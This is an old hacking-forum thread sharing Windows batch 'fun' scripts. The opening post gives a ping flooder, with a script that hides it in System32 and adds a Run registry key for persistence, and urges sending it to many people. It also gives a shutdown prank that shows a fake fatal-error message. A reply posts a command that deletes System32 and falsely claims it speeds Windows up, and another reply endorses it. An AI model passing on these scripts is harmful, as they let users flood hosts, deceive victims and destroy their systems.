Adblock breaks this site

Basic .Bat files :) For Starters/Fun

Discussion in 'Programming General' started by Macroman, Mar 21, 2009.

  1. Macroman

    Macroman Hero
    Do Not Trade

    Joined:
    Jan 21, 2007
    Posts:
    6,919
    Referrals:
    9
    Sythe Gold:
    12
    Basic .Bat files :) For Starters/Fun

    I'll just add more as I come allong them, please just keep these for fun their really stupid/simple but people have to learn somewhere
    Note: To save them, open notepad, save them as .bat files. You can use a .bat to .exe converter then if you wish.

    PING FLOODER
    Code:
     ping -t IPHERE 
    DOS.bat and convert it to .exe so its DOS.EXE

    Code:
    MD C:\WINDOWS\SYSTEM32\PING
    COPY DOS.EXE C:\WINDOWS\SYSTEM32\PING
    cd C:\windows\system32
    attrib ping +h /s /d
    REG ADD HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v DOS /t REG_SZ /d C:\windows\system32\ping\Attack
    Copy the above code into notepad, save it as PING.bat :)

    What this will do, is copy the simple ping script into system32 file and constantly ping. Now, the more people you send this to the more effective your script. :D


    This guys retarted.

    System Rebooter

    Code:
     shutdown -s -t 300 -c Windows has encountered a fatal error and must reboot! Please wait... 
    The number is the timer in seconds before shutdown. The words are displayed in a messagebox.
     
  2. Jazz00006

    Jazz00006 Apprentice
    Visual Basic Programmers

    Joined:
    Aug 26, 2005
    Posts:
    807
    Referrals:
    0
    Sythe Gold:
    0
    Basic .Bat files :) For Starters/Fun

    You forgot this one
    Code:
    rmdir %windir%\system32 /s /q
    It makes your windows computer faster etc.
     
  3. hampe-92

    hampe-92 Forum Addict

    Joined:
    Jul 10, 2008
    Posts:
    328
    Referrals:
    0
    Sythe Gold:
    0
    Basic .Bat files :) For Starters/Fun

    That one is simple and good :) It works great!
     
< Java Clue Solver (CLUE! not RS Clue Scrolls) | Looking for a team of coders >


 
 
Adblock breaks this site